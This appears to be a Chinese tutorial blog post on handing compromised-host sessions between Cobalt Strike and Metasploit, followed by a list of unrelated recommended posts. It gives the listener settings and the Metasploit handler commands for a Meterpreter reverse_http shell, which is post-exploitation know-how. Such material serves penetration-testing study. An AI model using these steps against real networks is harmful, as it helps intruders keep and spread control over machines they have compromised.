72内网安全-域横向CS&MSF联动及应急响应知识

拿到才行,拿不到就是多余的

案例一MSF&CobaltStrike 联动 Shell

有一些功能可能cs或者msf强大一些,他们两个可以相互调用,在真实情况下也是可以cs和msf同时启动的,

cs移交给msf

.创建Foreign监听器

"Listeners""Add","Name"填"msf"(可随便填),"Payload"选"Foreign HTTP","HTTP Host(Stager)"填msf的IP地址,"HTTP Port(Stager)"端口自己设定

协议不够的时候可以添加插件,

2.MSF监听模块设置对应地址端口

选择监听模块

use exploit/multi/handler

设置payload,注意与CS保持一致

set payload windows/meterpreter/reverse_http

设置地址端口,其中地址可以不设或为0.0.0.0,意为任意地址,或者设为msf的IP地址(与CS保持一致);端口一定要保持一致

set lhost 0.0.0.0

set lport 6677

检查设置

show options

执行

exploit

3.CS执行Spawn选择监听器

选择需要反弹shell的电脑,右键"Spawn",选择刚才生成的监听器

稍等可在MSF上看见反弹结果,如果没有请检查网络

然后选择自己想反弹的主机的shell。

会话就弹出来了

msf移交给cs

CS创建监听器->MSF载入新模块注入设置对应地址端口->执行CS等待上线

我们的目的就是反弹到cs刚刚生成的监听器,我们要返回s4,就是那个5566端口的

进入相关模块,设置对应的东西,ip,端口,s4等等

ip设置为刚刚cs的ip监听的端口就可以了,运行,cs等待上线

就完成了上线

ping

an

相关推荐
北京耐用通信1 小时前
电磁阀通讯频频“掉链”?耐达讯自动化Ethernet/IP转DeviceNet救场全行业!
人工智能·物联网·网络协议·安全·自动化·信息与通信
银空飞羽5 小时前
让Trae SOLO全自主学习开发近期爆出的React RCE漏洞靶场并自主利用验证(CVE-2025-55182)
前端·人工智能·安全
YJlio5 小时前
SDelete 学习笔记(9.18):安全删除、空闲清理与介质回收实战
笔记·学习·安全
CNRio6 小时前
第8章 网络安全应急响应
网络·安全·web安全
漏洞文库-Web安全7 小时前
Linux逆向学习记录
linux·运维·学习·安全·web安全·网络安全·逆向
wanhengidc8 小时前
云手机 数字生活中新的可能
运维·服务器·科技·安全·智能手机·生活
浩浩测试一下9 小时前
C&&汇编中的调用约定
大数据·汇编·安全·web安全·网络安全·系统安全
黑客思维者11 小时前
IEEE 1547.3-2023与IEC62443标准异同分析
安全·系统安全·devsecops
渲吧-云渲染11 小时前
PDM部署革新:SaaS化转型与安全新挑战
安全·pdm
吳所畏惧12 小时前
少走弯路:uniapp里将h5链接打包为apk,并设置顶/底部安全区域自动填充显示,阻止webview默认全屏化
android·安全·uni-app·json·html5·webview·js